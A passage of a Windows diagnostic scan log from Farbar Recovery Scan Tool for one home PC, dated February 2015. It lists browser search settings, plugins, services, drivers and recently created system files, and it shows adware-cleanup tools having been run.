BootExecute: ጔݭ숐Ιᜄጔ쉀ٶǪΙ콐ǪΙ죰ǪΙ예ǪΙ젘ǪΙ졈ǪΙ저ǪΙ딐ǪΙ죘ǪΙ좨ǪΙ뤘ǪΙ잸ǪΙ졠ǪΙ머ǪΙ욘ǪΙ쵀ǪΙ웈ǪΙ떸ǪΙ쫐ǪΙ릨ǪΙ믨ǪΙ몀ǪΙ鴨ǪΙ든ǪΙ륈ǪΙ른ǪΙ뻐ǪΙ멐ǪΙ좐ǪΙ먈ǪΙ셀ǪΙ쾀ǪΙ먠ǪΙ쓨Ǫ1Κ씰ǪΙ뫠ǪΙ쥨ǪΙ쾘ǪqΚ즀ǪΚǪΙ빀Ǫ!Κ썐Ǫ±Κ쉸ǪAΚ쑰ǪQΚ쒠ǪaΚ써ǪñΚ쐐ǪΚ뫸ǪΙ콨Ǫ¡Κ싘ǪıΚ숰ǪÁΚ쎘ǪÑΚ쎀ǪáΚ쌠ǪűΚ쏠ǪāΚ쐨ǪΚ쑘ǪġΚ션ǪɑΚ솸ǪŁΚ쉈ǪőΚ싰ǪšΚ솠ǪDZΚ쇨ǪƁΚ슨ǪΚ싀Ǫ숐ΙݔጠcƱΚ섐ǪǡΚ섨Ǫ숐Ιᜄጔ봘ݦ숐Ϊ́ጠlor rendering.
GroupPolicyUsers\S-1-5-21-2807770644-2077775581-3253585677-1005\User: Group Policy restriction detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
SearchScopes: HKLM -> {A185A52C-3808-4AE5-B562-CEB424688156} URL = http://www.bing.com/...rc=IE-SearchBox
SearchScopes: HKLM-x32 -> {A185A52C-3808-4AE5-B562-CEB424688156} URL = http://www.bing.com/...rc=IE-SearchBox
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-2807770644-2077775581-3253585677-1000 -> FEA307F66F7B4ED9B86659AAECDF29FB URL = https://www.google.c...q={searchTerms}
SearchScopes: HKU\S-1-5-21-2807770644-2077775581-3253585677-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.bing.com/...rc=IE-SearchBox
SearchScopes: HKU\S-1-5-21-2807770644-2077775581-3253585677-1000 -> {E4E78C57-1EE9-42EE-9D2F-C88110E7E838} URL = http://search.yahoo....p={searchTerms}
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
BHO-x32: WOT Helper -> {C920E44A-7F78-4E64-BDD7-A57026E7FEB7} -> C:\Program Files (x86)\WOT\WOT.dll ()
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM-x32 - WOT - {71576546-354D-41c9-AAE8-31F2EC22BF0D} - C:\Program Files (x86)\WOT\WOT.dll ()
Toolbar: HKLM-x32 - No Name - {8660E5B3-6C41-44DE-8503-98D99BBECD41} -  No File
Toolbar: HKU\S-1-5-21-2807770644-2077775581-3253585677-1000 -> No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
Toolbar: HKU\S-1-5-21-2807770644-2077775581-3253585677-1000 -> No Name - {472734EA-242A-422B-ADF8-83D1E48CC825} -  No File
Toolbar: HKU\S-1-5-21-2807770644-2077775581-3253585677-1000 -> No Name - {71576546-354D-41C9-AAE8-31F2EC22BF0D} -  No File
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.ad...Plus/1.6/gp.cab
DPF: HKLM-x32 {E6F480FC-BD44-4CBA-B74A-89AF7842937D} http://content.syste...ri_4.4.21.0.cab
Handler-x32: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files (x86)\Belarc\Advisor\System\BAVoilaX.dll (Belarc, Inc.)
Handler-x32: wot - {C2A44D6B-CB9F-4663-88A6-DF2F26E4D952} - C:\Program Files (x86)\WOT\WOT.dll ()
Winsock: Catalog9 01 C:\Windows\SysWOW64\iavlsp.dll [118784] (iolo technologies, LLC)
Winsock: Catalog9 02 C:\Windows\SysWOW64\iavlsp.dll [118784] (iolo technologies, LLC)
Winsock: Catalog9 13 C:\Windows\SysWOW64\iavlsp.dll [118784] (iolo technologies, LLC)
Winsock: Catalog9-x64 01 C:\Windows\system32\iavlsp64.dll [160256] ()
Winsock: Catalog9-x64 02 C:\Windows\system32\iavlsp64.dll [160256] ()
Winsock: Catalog9-x64 13 C:\Windows\system32\iavlsp64.dll [160256] ()
Tcpip\Parameters: [DhcpNameServer] 208.67.222.222 208.67.220.220 208.67.222.220

FireFox:
========
FF ProfilePath: C:\Users\Becky's\AppData\Roaming\Mozilla\Firefox\Profiles\rcg3pbqg.default
FF SearchEngineOrder.3: Bing
FF Keyword.URL: hxxp://www.bing.com/search?FORM=U079DF&PC=U079&q=
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_16_0_0_305.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll ()
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin-x32: @logitech.com/HarmonyRemote,version=1.0.0 -> C:\Program Files (x86)\Logitech\Harmony Remote Driver\NprtHarmonyPlugin.dll (Logitech Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2807770644-2077775581-3253585677-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Becky's\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)

Chrome:
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR Profile: C:\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-09-24]
CHR Extension: (Google Drive) - C:\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-09-24]
CHR Extension: (Google Search) - C:\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-09-24]
CHR Extension: (Wikipedia Quick Hints) - C:\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\Extensions\ldnhgfghebflgcndlbppfanbchpgmkna [2014-11-06]
CHR Extension: (Chrome In-App Payments service) - C:\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-24]
CHR Extension: (Gmail) - C:\Users\Becky's\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-09-24]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
S2 ioloFileInfoList; C:\Program Files (x86)\iolo\Common\Lib\ioloServiceManager.exe [4700872 2014-08-12] (iolo technologies, LLC)
R2 ioloSystemService; C:\Program Files (x86)\iolo\Common\Lib\ioloServiceManager.exe [4700872 2014-08-12] (iolo technologies, LLC)
R2 LightScribeService; c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-05-18] (Hewlett-Packard Company) [File not signed]
S4 MotoHelper; C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperService.exe [202048 2010-09-07] ()
R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [20480 2009-09-16] (Intuit) [File not signed]
S4 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [65536 2006-11-09] (Intuit Inc.) [File not signed]
R2 vseamps; C:\Program Files\Common Files\Commtouch\AntiVirus5\vseamps.exe [122120 2014-03-25] (CYREN Inc.)
R2 vsedsps; C:\Program Files\Common Files\Commtouch\AntiVirus5\vsedsps.exe [119560 2014-03-25] (CYREN Inc.)
S3 vseqrts; C:\Program Files\Common Files\Commtouch\AntiVirus5\vseqrts.exe [181512 2014-03-25] (CYREN Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AMP; C:\Windows\system32\Drivers\amp.sys [174856 2014-03-25] (CYREN Inc.)
R2 AMPSE; C:\Windows\system32\Drivers\ampse.sys [1728776 2014-03-25] (CYREN Inc.)
R1 ElRawDisk; C:\Windows\system32\drivers\ElRawDsk.sys [31432 2012-04-17] (EldoS Corporation)
S1 FileDisk; C:\Windows\SysWow64\Drivers\FileDisk.sys [9341 2010-06-29] (iolo technologies, LLC (based on original work by Bo Brantén))
R3 MRVW148; C:\Windows\System32\DRIVERS\MRVW148.sys [514048 2008-08-20] (Marvell Semiconductor, Inc)
R1 RawDisk3; C:\Windows\system32\drivers\rawdsk3.sys [32912 2014-08-12] (EldoS Corporation)
U3 aswMBR; \??\C:\Users\Becky's\AppData\Local\Temp\aswMBR.sys [X]
U3 aswVmm; \??\C:\Users\Becky's\AppData\Local\Temp\aswVmm.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-02-11 16:56 - 2015-02-11 16:57 - 00013293 _____ () C:\Users\Becky's\Desktop\FRST.txt
2015-02-11 16:55 - 2015-02-11 16:56 - 00000000 ____D () C:\FRST
2015-02-11 16:54 - 2015-02-11 16:54 - 00002200 _____ () C:\Users\Becky's\Desktop\aswMBR.txt
2015-02-11 16:54 - 2015-02-11 16:54 - 00000512 _____ () C:\Users\Becky's\Desktop\MBR.dat
2015-02-11 15:38 - 2015-02-11 15:39 - 02134016 _____ (Farbar) C:\Users\Becky's\Desktop\FRST64.exe
2015-02-11 15:37 - 2015-02-11 15:38 - 05198336 _____ (AVAST Software) C:\Users\Becky's\Desktop\aswMBR.exe
2015-02-11 15:11 - 2015-02-11 15:11 - 00000448 _____ () C:\Windows\SysWOW64\iolo.ini
2015-02-11 15:11 - 2015-02-11 15:11 - 00000448 _____ () C:\Windows\system32\iolo.ini
2015-02-11 14:51 - 2015-02-11 14:51 - 00001285 _____ () C:\Users\Becky's\Desktop\JRT.txt
2015-02-11 14:31 - 2015-02-11 14:31 - 01388274 _____ (Thisisu) C:\Users\Becky's\Desktop\JRT.exe
2015-02-11 14:20 - 2015-02-11 14:20 - 00009274 _____ () C:\Users\Becky's\Desktop\AdwCleaner[S0].txt
2015-02-11 14:10 - 2015-02-11 14:10 - 00003288 ____N () C:\bootsqm.dat
2015-02-11 13:58 - 2015-02-11 14:03 - 00000000 ____D () C:\AdwCleaner
2015-02-11 13:51 - 2015-02-11 13:51 - 02112512 _____ () C:\Users\Becky's\Desktop\AdwCleaner.exe
2015-02-11 10:44 - 2015-02-11 10:45 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2015-02-11 08:46 - 2015-02-11 08:46 - 00084372 _____ () C:\Users\Becky's\Desktop\Extras.Txt
2015-02-11 08:43 - 2015-02-11 08:43 - 00385046 _____ () C:\Users\Becky's\Desktop\OTL.Txt
2015-02-11 08:12 - 2015-02-11 08:10 - 00602112 _____ (OldTimer Tools) C:\Users\Becky's\Desktop\OTL.exe
2015-02-11 08:10 - 2015-02-11 08:10 - 00602112 _____ (OldTimer Tools) C:\Users\Becky's\Downloads\OTL.exe
2015-02-10 07:38 - 2015-02-10 07:38 - 00000000 ____D () C:\ProgramData\Commtouch
2015-02-10 07:38 - 2015-02-10 07:38 - 00000000 ____D () C:\Program Files\Common Files\Commtouch
2015-02-10 07:38 - 2014-08-12 23:38 - 00032912 _____ (EldoS Corporation) C:\Windows\system32\Drivers\rawdsk3.sys
2015-02-10 07:38 - 2014-03-25 15:59 - 01728776 ____R (CYREN Inc.) C:\Windows\system32\Drivers\ampse.sys
2015-02-10 07:21 - 2015-02-10 07:21 - 00001487 _____ () C:\Users\Becky's\Desktop\LiveBoost.lnk
2015-02-09 17:14 - 2015-02-10 07:32 - 00000340 _____ () C:\Windows\Tasks\HPCeeScheduleForBecky's.job
2015-02-09 17:14 - 2015-02-09 17:14 - 00003198 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForBecky's
2015-02-09 16:42 - 2014-12-12 23:09 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-02-09 16:42 - 2014-12-12 21:33 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2015-02-09 14:47 - 2015-02-09 14:47 - 00000000 ____D () C:\Windows\system32\appraiser
2015-02-01 18:45 - 2014-10-17 20:05 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2015-02-01 18:45 - 2014-10-17 19:33 - 03209728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2015-02-01 18:45 - 2014-07-06 20:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2015-02-01 18:45 - 2014-07-06 20:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2015-02-01 18:45 - 2014-07-06 20:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2015-02-01 18:45 - 2014-07-06 20:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2015-02-01 18:45 - 2014-07-06 19:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2015-02-01 18:45 - 2014-07-06 19:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2015-02-01 18:45 - 2014-07-06 19:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2015-02-01 18:45 - 2014-07-06 19:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2015-02-01 16:11 - 2014-12-18 21:06 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2015-02-01 16:11 - 2014-12-18 19:46 - 00141312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2015-02-01 16:11 - 2014-12-05 22:17 - 00303616 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll
2015-02-01 16:11 - 2014-12-05 21:50 - 00156672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncsi.dll
2015-02-01 16:11 - 2014-12-05 21:50 - 00052224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlaapi.dll
2015-02-01 16:11 - 2014-12-03 20:50 - 00830976 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2015-02-01 16:11 - 2014-12-03 20:50 - 00741376 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2015-02-01 16:11 - 2014-12-03 20:50 - 00413184 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2015-02-01 16:11 - 2014-12-03 20:50 - 00396800 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2015-02-01 16:11 - 2014-12-03 20:50 - 00227328 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2015-02-01 16:11 - 2014-12-03 20:50 - 00192000 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2015-02-01 16:11 - 2014-12-03 20:44 - 01083392 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2015-02-01 16:11 - 2014-12-01 17:28 - 01232040 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2015-02-01 16:11 - 2014-10-29 20:03 - 00165888 _____ (Microsoft Corporation) C:\Windows\system32\charmap.exe
2015-02-01 16:11 - 2014-10-29 19:45 - 00155136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\charmap.exe
2015-02-01 16:09 - 2014-11-26 19:43 - 00389296 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-02-01 16:09 - 2014-11-26 19:10 - 00342200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-02-01 16:09 - 2014-11-21 21:06 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-02-01 16:09 - 2014-11-21 21:06 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-02-01 16:09 - 2014-11-21 20:50 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-02-01 16:09 - 2014-11-21 20:49 - 02885120 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-02-01 16:09 - 2014-11-21 20:49 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-02-01 16:09 - 2014-11-21 20:40 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-02-01 16:09 - 2014-11-21 20:35 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-02-01 16:09 - 2014-11-21 20:26 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-02-01 16:09 - 2014-11-21 20:22 - 19749376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-02-01 16:09 - 2014-11-21 20:20 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2015-02-01 16:09 - 2014-11-21 20:14 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-02-01 16:09 - 2014-11-21 20:07 - 00501248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-02-01 16:09 - 2014-11-21 20:07 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2015-02-01 16:09 - 2014-11-21 20:06 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2015-02-01 16:09 - 2014-11-21 20:05 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-02-01 16:09 - 2014-11-21 20:01 - 02277888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-02-01 16:09 - 2014-11-21 19:59 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2015-02-01 16:09 - 2014-11-21 19:58 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2015-02-01 16:09 - 2014-11-21 19:56 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-02-01 16:09 - 2014-11-21 19:54 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2015-02-01 16:09 - 2014-11-21 19:49 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-02-01 16:09 - 2014-11-21 19:49 - 00718848 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-02-01 16:09 - 2014-11-21 19:46 - 02125312 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-02-01 16:09 - 2014-11-21 19:45 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2015-02-01 16:09 - 2014-11-21 19:40 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2015-02-01 16:09 - 2014-11-21 19:35 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2015-02-01 16:09 - 2014-11-21 19:33 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-02-01 16:09 - 2014-11-21 19:29 - 04299264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-02-01 16:09 - 2014-11-21 19:23 - 00688640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-02-01 16:09 - 2014-11-21 19:22 - 02052096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-02-01 16:09 - 2014-11-21 19:21 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2015-02-01 16:09 - 2014-11-21 19:15 - 01548288 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-02-01 16:09 - 2014-11-21 19:13 - 12836864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-02-01 16:09 - 2014-11-21 19:03 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-02-01 16:09 - 2014-11-21 19:00 - 01888256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-02-01 16:09 - 2014-11-21 18:56 - 01307136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-02-01 16:09 - 2014-11-21 18:54 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-02-01 16:08 - 2014-11-21 21:13 - 25059840 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-02-01 16:08 - 2014-11-21 20:50 - 00580096 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-02-01 16:08 - 2014-11-21 20:48 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-02-01 16:08 - 2014-11-21 20:41 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-02-01 16:08 - 2014-11-21 20:37 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-02-01 16:08 - 2014-11-21 20:34 - 06039552 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-02-01 16:08 - 2014-11-21 20:34 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-02-01 16:08 - 2014-11-21 20:22 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-02-01 16:08 - 2014-11-21 20:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-02-01 16:08 - 2014-11-21 20:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-02-01 16:08 - 2014-11-21 20:05 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-02-01 16:08 - 2014-11-21 19:47 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-02-01 16:08 - 2014-11-21 19:43 - 14412800 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-02-01 16:08 - 2014-11-21 19:36 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2015-02-01 16:08 - 2014-11-21 19:28 - 02358272 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-02-01 16:05 - 2014-12-11 11:47 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2015-02-01 16:05 - 2014-11-10 21:09 - 01424384 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2015-02-01 16:05 - 2014-11-10 20:44 - 01230336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2015-02-01 16:05 - 2014-11-10 19:46 - 00119296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2015-02-01 16:05 - 2014-10-02 20:12 - 02020352 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2015-02-01 16:05 - 2014-10-02 20:12 - 00346624 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2015-02-01 16:05 - 2014-10-02 20:12 - 00310272 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2015-02-01 16:05 - 2014-10-02 20:12 - 00181248 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2015-02-01 16:05 - 2014-10-02 20:11 - 00266240 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2015-02-01 16:05 - 2014-10-02 19:45 - 01177088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2015-02-01 16:05 - 2014-10-02 19:45 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2015-02-01 16:05 - 2014-10-02 19:45 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2015-02-01 16:05 - 2014-10-02 19:45 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2015-02-01 16:05 - 2014-10-02 19:44 - 00198656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe
2015-02-01 16:03 - 2014-12-11 23:35 - 05553592 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-02-01 16:03 - 2014-12-11 23:31 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2015-02-01 16:03 - 2014-12-11 23:31 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2015-02-01 16:03 - 2014-12-11 23:31 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2015-02-01 16:03 - 2014-12-11 23:11 - 03971512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2015-02-01 16:03 - 2014-12-11 23:11 - 03916728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2015-02-01 16:03 - 2014-12-11 23:07 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2015-02-01 15:57 - 2014-11-07 21:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2015-02-01 15:57 - 2014-11-07 20:45 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-02-11 16:52 - 2013-01-27 19:06 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-02-11 15:18 - 2009-07-13 22:45 - 00018736 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-02-11 15:18 - 2009-07-13 22:45 - 00018736 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-02-11 15:11 - 2010-10-09 17:47 - 00000429 _____ () C:\Windows\SysWOW64\iolo.ini.txt
2015-02-11 15:10 - 2010-12-01 15:01 - 00001093 _____ () C:\Windows\setupact.log
2015-02-11 15:10 - 2009-07-13 23:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-02-11 15:09 - 2014-03-14 10:51 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2015-02-11 15:08 - 2009-08-23 00:40 - 01736819 _____ () C:\Windows\WindowsUpdate.log
2015-02-11 14:17 - 2010-01-13 16:30 - 00000000 ____D () C:\Users\Becky's
2015-02-11 07:46 - 2010-02-04 14:59 - 00000052 _____ () C:\Windows\SysWOW64\DOErrors.log
2015-02-10 16:50 - 2013-01-27 19:06 - 00701616 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-02-10 16:50 - 2013-01-27 19:06 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-02-10 16:50 - 2011-09-18 17:58 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-02-10 07:31 - 2012-04-25 12:12 - 00000386 _____ () C:\Windows\system32\ioloBootDefrag.cfg
2015-02-10 07:31 - 2011-04-18 20:04 - 00121296 _____ () C:\Windows\PFRO.log
2015-02-10 07:31 - 2010-10-09 17:41 - 00000000 ____D () C:\ProgramData\iolo
